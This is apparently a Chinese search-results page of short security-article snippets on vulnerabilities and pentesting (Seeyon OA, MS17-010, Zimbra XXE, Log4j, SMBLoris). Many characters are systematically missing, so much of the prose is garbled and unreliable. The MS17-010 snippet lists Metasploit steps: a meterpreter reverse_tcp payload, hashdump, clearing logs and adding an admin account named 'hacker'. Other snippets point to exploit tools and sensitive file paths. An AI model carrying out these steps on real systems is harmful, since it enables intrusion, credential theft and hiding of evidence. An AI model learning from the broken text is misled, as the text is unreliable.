展开

关键词

网站查找 OA办公越权

渗透测试服务,是甲方授权乙方安全公司对自身的网站,以及APP,办公进行的全面人工安全渗透,对的检测与测试,包括SQL注入,XSS存储,反射,逻辑,越权,我们SINE安全公司在进行渗透测试前 前段时间我们SINE安全公司,收到甲方公司的渗透测试ORDER,对公司使的OA办公进行全面的安全检测,与测试,针对前期我们做的一些准备,与测试内容,我们来详细跟大家分享一下渗透测试的过程。 还是自己工程师单独研发的,如果是自行开发的,那会很容易的测试出来,第三方公司开发的相对来说没有那多,需要时间与精力去进行详细的测试,才能发现。 OA办公友,致远OA都存在远程代码执行,客户目前使的致远OA,目前大多数的企业都在使的一套OA,我们来看下这个:通过远程代码执行可以直接调CMD命令,对当前的网站服务器进行查看 ,在方便的同时,安全也面临着严重的考验,我们SINE安全技术对整个办公渗透测试发现,存在太多的,像XSS存储,越权,在流程管理,方案提交功能上我们发现一处重要的越权,代码如下:

67220

macos Nday 从挖掘到

ReadRegister32 这是我在另一个模块AppleIntelFramebufferAzul中找到的一个,因为我的目的很明确,就是需要信息泄,所以我就从有类似特征的函数进行入手了,如函数名位 这里我来做提权的有两个,queryCompletion我们可以通过参数来控制越界 call,这个的就比较简单,直接通过堆喷构造数据然后泄kslide做 ROP 即可,但是我们在10.13 所以我在尝试了一段时间后放弃了 后来我又找到了一个,这个的条件相对来说也比较苛刻(我们可以控制 *a2): ? 后来想到一个问题,如果这个值超出了对象,那就是我们不可控的了,而且还有一个问题就是就算在对象内,有这多次的解引也不一定每次都能满足,我重启后果然失效了,我后来看了一下这个对象的大小就是0x1f60, mwri-apple-AVEBridge-invalid-read-advisory-2018-01-19.pdf 《mac OS X internals》 第九章 文章首发 360 涅槃团队, 一支专注于苹果安全研究和挖掘的团队

68320
  • 广告
    关闭

    腾讯云精选爆品盛惠抢购

    腾讯云精选爆款云服务器限时体验20元起,云数据库19.9元/年起,还有更多热门云产品满足您的上云需求

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    SMBDoS攻击任何Windows

    近日微软报出SMB V1存在,安全研究员并将此称作 “ SMBLoris ”,解释其能够发动拒绝服务(Dos)攻击,可以感染 Windows 2000 及以上操作的任一版本 SMB V1 通过进行Python编程伪造数据包,可以进行远程拒绝服务攻击。 只需要一台普通计算机(或者虚拟机),就可以通过大量消耗服务器的内存,让服务器崩溃。 这会占中的所有物理内存, 并导致 cpu 的峰值达 100%, 最终让计算机崩溃。 此已经通告微软,但微软表示此将在Windows 10解决,解决方法就是放弃SMB V1协议。 (笔者猜测这也是微软一个手段,可以强迫户升级到Windows 10,否则那些Windows 7铁杆户何日走入10呀!) 同时工控操作不能开启windows防火墙,所以建议在外界采工业防火墙来做边界安全,由于此DoS攻击会产生大量连接,工业防火墙可以设置连接个数来抵御DoS攻击。

    11430

    MS17_010(永恒之蓝)攻击windows

    192.168.48.129 靶机需关闭防火墙并且没打永恒之蓝补丁 攻击过程 获取靶机和攻击机的IP地址 win2008 命令:ipconfig image.png kali 命令:ifconfig MS17_010 验证是否存在 1.启msfconsole 命令:msfconsole 2.搜索模块 命令:search ms17_010 3.验证模块 命令:use yes(必须配置),no(不一定要配置) 命令:set rhost 192.168.48.129 5.进行验证靶机 命令:run 进行渗透攻击 输入back命令返回msf5命令行 1.攻击模块 模块 set payload windows/x64/meterpreter/reverse_tcp run 2.模块使 查看靶机信息:sysinfo 获得靶机户密码:hashdump 捕捉靶机屏幕 :screenhot 清除靶机日志:clearev 3.shell 命令:shell 创建windows户 命令:net user hacker hacker123456 /add 将创建的户加入到管理员组

    11530

    致远A8协同管理0day深度剖析和

    去找classs去研究一下产生的那问题来了。这个目录下啥也没有。去原帖子向大佬请教解密加密文件名的class文件得到的。想吃吃现成的。大佬也没有理我。自己搞吧 第一次搞。 那只有一个可能了全搞到了lib目录下了肯定 那搞。上大马把这个目录全部打包下来下载下载分析一波。由于网速不行下了好久手机也欠费了。找了一个基友的服务器下载下源码我在公司的网下载下来。 上面扯了一会儿蛋,接下来分析一下这个 点在:/seeyon/htmlofficeservlet 那我们看web.xml里面有没有这个东东。 不是什奇安信的ACL控制。这是waf的暂时修复办法 接下来根据代码审计的和自己本地的环境。来逆推exp构造进行 访问一下看看报错不。。不报错搞定 接下来上传各种马子把 好了。 以上涉及到的所有东西全部打包:,当然某些工具除外哈哈哈 点击下载 本地下载 致远A8协同管理0day深度剖析和附件 下载量 : 144  |  文件类型 : 图片文件   原文由https

    16330

    网站修复代码

    该网站的是JAVA语言开发,数据库使的是oracle,mysql,sql数据库,服务器支持windows2008,windows2012,以及linux centos。 我们来简单的了解下什是jeecms,该主要是针对内容文章管理的一个,支持微信,以及公众号,移动电脑端自适应的模板,开发强大,安全,稳定,优化好,很多程序文件夹做了详细的安全权限分配,禁止直行 jeecms 网站分析 jeecms发生的原因是在于网站的上传功能,存在可以绕过安全拦截,直接将jsp格式的网站木马文件上传到服务器中去,由于该上传组件含有远程调图片链接的功能,导致调的是并没有做详细的安全过滤 我们来看下代码: 当我们使远程调图片功能的时候,会使前端的upfile函数去调,然后经过separate的安全分隔符来进行确认文件的格式,导致没有任何的安全验证就可以上传文件,导致网站的发生 jeecms 网站修复与建议 目前通过搜索查询到使jeecms的网站达到上万个,使该jeecms建站的网站运营者,请尽快升级网站到最新版V9版本,自己公司技术有限的,请将远程上传图片功能去掉

    59720

    Jboss

    在github中搜索jexboss下载代码 还可以在kali中直接下载  git clone https://github.com/joaomatosf/jexboss.git 通过阅读readme 文件,查看使方法,先安装模板 pip install -r requires.txt ?

    39710

    Nebula包CVE-2016-0189分析

    Nebula EK包中对CVE-2016-0189的,比其它包的方有了一定改进,这里进行一下深入分析。 本文试图windbg来分析时的内存布局,使得读者对该有更深刻的理解。 2. CVE-2016-0189的关键知识点 CVE-2016-0189是个关于VBScript的。 CVE-2016-0189 深入分析 Nebula EK的在越界访问的基础上实现了: 1.泄VBScript对象的地址 2.读取任意地址 3.写入任意地址(受限) 这3种手段在实现原理上都是类似的 这里脚本并未实现任意值的写入,然而并不影响。 正是由于这个原因,一些包选择了仅在XP上对CVE-2016-0189 进行。 ? Nebula EK采了一个BlackHat 2014[2]上 公布的技巧来规避这个问题。

    53760

    渗透测试驻场面试真实经验分享

    1.json的csrf的 2.小程序的渗透和普通渗透的差异 3.app本身的测试 四大组件 4.业务上线前,测试,从哪些角度测试 5.java应上传,如何绕过 6.应,但是无法修复和停 ,你办 7.cookie你会测试什内容 8.户登录你会测试哪些内容 9.你审计java代码挖到的挖的,修复的 10.如果开发通过加referer的方式修复csrf,判断这个referer 服务端风险 组件类(MS12-020、ShellShock、心血、ST2…) 业务应类(注入跨站越权执行上传下载弱口令…)。 文件后缀名绕过 3)配合文件包含 4)配合服务器解析 5)配合操作文件命令规则 6)CMS、编辑器 7)配合其他规则 8)WAF绕过 a. waf本身缺陷 06 应, 但是无法修复和停,你办 1)上安全设备,如waf 2) ACL 3)临时性补丁 4)加认证 5)二次封装 07 cookie你会测试什内容 1)字段分析,

    1.8K20

    【原创】基础篇 -- RCE总结

    所以现在我每研究一个/攻击手段,我都会按照以下思路去进行。 1. 什是XXX的原理是什? 2. 为什会产生这个?根本的原因是什? 3. 挖掘这个验证是否存在?这个? 4. 的前提条件是什影响的范围?造成的危害有多大? 5. 如果在甲方公司,自己公司站点受到此攻击,我应该如何应急响应修复? 6. 什是远程代码执行 远程命令/代码执行,简称RCE,可以让攻击者直接向后台服务器远程注入操作命令或者代码,从而控制后台。RCE分为远程命令执行ping和远程代码执行evel。 造成的危害 RCE造成的危害不言而喻,高危。能直接获取服务器的控制权(既然服务器都拿下了,为所欲为。) 7. 发现此,该修复 通的修复方案,升级插件/框架/服务最新版。 注:的影响范围和的前提条件要视情况而定,例如Struts2著名的RCE,直至现在2020年,以前很多一些旧的已经不复存在,我们只好理解其中的原理即可。

    4.3K41

    多,学习!

    ,面对这多的,我们该学习呢? 经过我们接触过这多的学员与安全大佬,从他们的成长经历中可以得出一二点心得,那就是以点带面的学习。 ? 安全学习应该首先从一个方向开始入手,例如Web安全、或者安全等一个特定的方向,我们以Web安全为例,学习的时候应该掌握最基本的前端和后端语言,不要求很高,起码能够读懂代码,这是最基本的要求, 否则对于一些的原理,只能停留在浅显的层面,而不能深入剖析。 有了最基本的知识之后,接下来应该就重点的历史进行复现,如果有时间和经历与学习基础,最好能够通过代码分析或者其他工具捋一捋导致产生的流程,例如往年的各种中间件、S2列等等。 一旦我们快速掌握复现这些的技巧之后,那对于最新的,我们也可以自己将其复现,而不仅仅是停留于依赖别人的层面了。

    21010

    【Pikachu】不安全的文件下载

    1.什是文件下载?这个网站的原理是啥? ( 又称:任意文件下载) 3.发现这个去验证是否存在?这个方式 由于不知道敏感文件的路径,我们可以../../(返回上次目录)进行猜解。 /flag.txt 成功,下载其它敏感文件同理。 image.png 4.的首要条件是啥?危害的范围?导致的危害有多大? 总体来说,任意文件下载主要是为了信息收集,我们通过对服务器配置文件的下载,获取到 大量的配置信息、源码,从而根据获取的信息来进一步挖掘服务 器从而入侵。 以下整理了-些下载 文件: Windows: c:\boot.ini //查看版本 C:\Windows\system32\inetsrv\MetaBase.xml //IIS配置文件 C:\Windows

    5820

    Windows开发教程Part 5 :返回导向编程(ROP)

    * 本文作者:zusheng,本文属FreeBuf原创奖励计划,未经许可禁止转载 一、前言 ——信息安全界最常见的词汇,在百度百科是这样描述的: 是在硬件、软件、协议的具体实现或安全策略上存在的缺陷 本文主要介绍的是Windows软件开发教程。我花了大量的时间来研究了计算机安全领域Windows开发,希望能和大家分享一下,能帮助到对这方面感兴趣的朋友,如有不足,还请见谅。 前文回顾 Windows开发教程Part 1 Windows开发教程Part 2:Short Jump Windows开发教程Part 3:Egghunter Windows开发教程 三、开发分析 开始和之前是差不多的步骤,这也是开发必不可少的步骤,所以我们不再做详细介绍了,只是大致演示一下分析获取到一些必需的数据。 我们是简单来,主要生成一个3000字符的测试文件test.m3u 使Immunity Debugger打开软件VUPlayer.exe,在打开的对话框中点击file-openplaylist打开测试文件

    49130

    渗透

    首先给你讲解一下是指操作的编写存在一些缺陷或者是错误,而黑客就可以通过这个**计算机。 今天来讲讲。 这里我很悟不透,因为从1024之后就属于动态/私有端口了,不知道为什这里还要再分类,只知道它的一个例外是RPC是配对着32768。 讲解完端口之后找到你要填写对方PC的端口号,但是这点你要注意,如果你要通过你填写的端口而连接对方的计算机,那你也要开通自己的那个端口。 找到了以后,打开CMD指令(什是CMD指令这个就不说了吧,要是不知道的上网查),输入“telnet 192.153.1.101”,然后按下回车键,输入账号和密码。**成功!!! 附:这里要说明一下,现在XP及WIN7的计算机很难这个方法破解了,因为微软随时发布着补丁,补丁把补上之后,那个也就无了,但是2000的机子一扫一大堆都存在

    69350

    鉴谈

    0x01鉴谈 前言本来不想讲这个事情,但是因为很多小白对这方面可能不太了解,所以讲一讲,关于鉴定网络上流传poc或exp的方法,原因是这二天关于cve-2019-0708这个,其实也不是头一次了 ,更多还是被大规模后才给了cve编号。 浏览器跨域,EoP 内核提权,Read 任意地址读写(包括信息泄露)通过上面的英文缩写对应中文意思就知道了,cvss基本度量,下面的图只是基本度量,有八个参数和指标,后面想获取更多关于完整性 ,而且根据软件的版本和历史修复情况Payload也会经常被别人在发现一个新入口点拿老Payload去触发,而且还需要看软件本身的什语言写的,还有写poc的人喜欢python。 0x06 Shellcode Shellcode一般在bin上面也就是操作上面,shellcode主要来写入cmdshell,执行命令等,而且根据不同操作的特性shellcode适应性也不一样

    47220

    zimbra RCE

    前言 近期在测试一个目标的时候发现对方好几个zimbra的服务器,按照网上提供的方法测试了之后发现不成功!接着自己搭建了zimbra在自己进行测试之后成功并且拿下zimbra服务器! https://www.jianshu.com/p/722bc70ff426 环境搭建首先需要一个ubuntu的,并且更新好源,接着就安装辅助包! zimbra RCE 靶机复现 Zimbra的配置文件是在 /conf/localconfig.xml 这个文件里面的!里面有保存到一些配置信息的户名和密码! 实战 zimbra RCE 复现这个主要就是遇到了这个邮箱服务器!并且存在XXE读取文件!前面的准备都是为了这一刻!!!!! 首先获取它的数据包,了CVE-2019-9670 XXE来读取配置文件。Zimbra配置文件位置为/conf/localconfig.xml。

    1.8K10

    Unifi Log4jshell

    介绍 到现在为止,您可能已经很清楚最近披露的 Java 日志库 Log4j 的一个。该影响广泛,影响开源项目和企业软件。 Ubiquiti 在发布后不久宣布,他们的一些产品受到影响。 在本文中,我们将分解过程并介绍一些对底层操作的访问的后方法。 确定您的攻击面 Unifi 网络应程序于管理 Ubiquiti 软件和硬件解决方案。 出于本文的目的,我们将使 Docker 安装,原因如下: 操作上可的最有限的工具集 最受限制的环境 假设有限的 shell 和本地设置将使攻击路径和后步骤在实际工作场景中最可重现。 一旦您确定了一个易受攻击的实例,就可以轻松地进行。 它在户界面的深处。您可以添加其他管理员,但没有太多理由这样做,因为我们已经拥有访问权限。 image.png 显示影响并增加自动化。 据我所知,这个 Log4j 有可能产生重大影响。为什

    36110

    看图说话:反射式XSS(跨站)示例

    是不是只要能懂得构造“恶意参数”,并且它来完成测试,就可以判断出是否存在反射型XSS呢? 并非所有都支持在url中添加参数,那不支持在url中添加参数的是否就代表不存在XSS呢? 读到这里,不妨暂停一下做一个思考:这是否能说明这个网页存在反射型XSS呢?如果存在,黑客会这个进行攻击呢?也就是说这个攻击如何传递给其他户呢? 弹窗的出现,说明应没有对相关的JS作出过滤,所以我们可以说它是存在XSS的。 再深入思考一下:为什要过滤呢?这样未经过滤会导致什后果呢? 中的“即时消息”攻击:xss攻击信息存在于“即时消息”,消息接收方接收到消息之后,被xss攻击。 3.

    5.6K20

    APP网站小程序的寻找测试服务

    好,首先来简单的介绍一下什,就是我在挖之前首先要知道我到底要挖的是个什东西,这个到底是什意思,官方的一个定义就是这个在硬件软件协议里面的具体表现,或者是在安全策略的一个缺陷, 从而可以使攻击者能够在未授权的情况下访问或者破坏。 我们来看一下这边的一个威胁的定义,就是如果你是一个黑客,或者是说我是一个计算机技术比较好的,那去找攻击一个网站,你可以认为是自己或者是黑客,黑客是攻击一个网站的。 我如果要攻击,必须要找到一个安全弱点,这个安全弱点就是我们的,只有通过我才可以去控制我们的网站,然后影响到业务,一般的攻击手法就是信息搜集,看网站的环境以及服务器版本,或网站功能接口是否对外开放了 API接口,截取数据包进行测试,看看返回的值是否存在越权或修改功能,一旦存在的话就会对网站的数据以及一些重要信息就会被泄露或,所以这个威胁一定不能被非法份子所

    10840

    网站整改修复解决

    目前网站存在导致被网警下发整改通知以及限期处理并回执的问题越来越多,云计算等技术极大地促进了服务器资源的分配和的部署,但随之而来的是资产管理中的安全风险。 为有效保障企业工作的发展,相关法律法规明确要求网络管理人员及时处理、病毒、攻击等安全风险。 网站安全攻防演练整改建议全周期实施安全监控服务,上线前进行安全监控,问题发生后及时整改复测,确保无高风险,中风险后方可上线试运行。 例如,增强户密码的复杂性,增加户登录验证码功能,增加攻击者破解户密码的难度;增加网络端口开放审查,避免攻击者使通道入侵主机;加强风险评估和测试,避免攻击者使安全控制服务器获取敏感信息;加强对网站安全设备和管理平台的监控 如果对网站整改操作不会以及对整改报告和回执不会写的话可以向网站整改公司寻求服务,像SINE安全,鹰盾安全,绿盟都是做修复整改的。

    12120

    扫码关注云+社区

    领取腾讯云代金券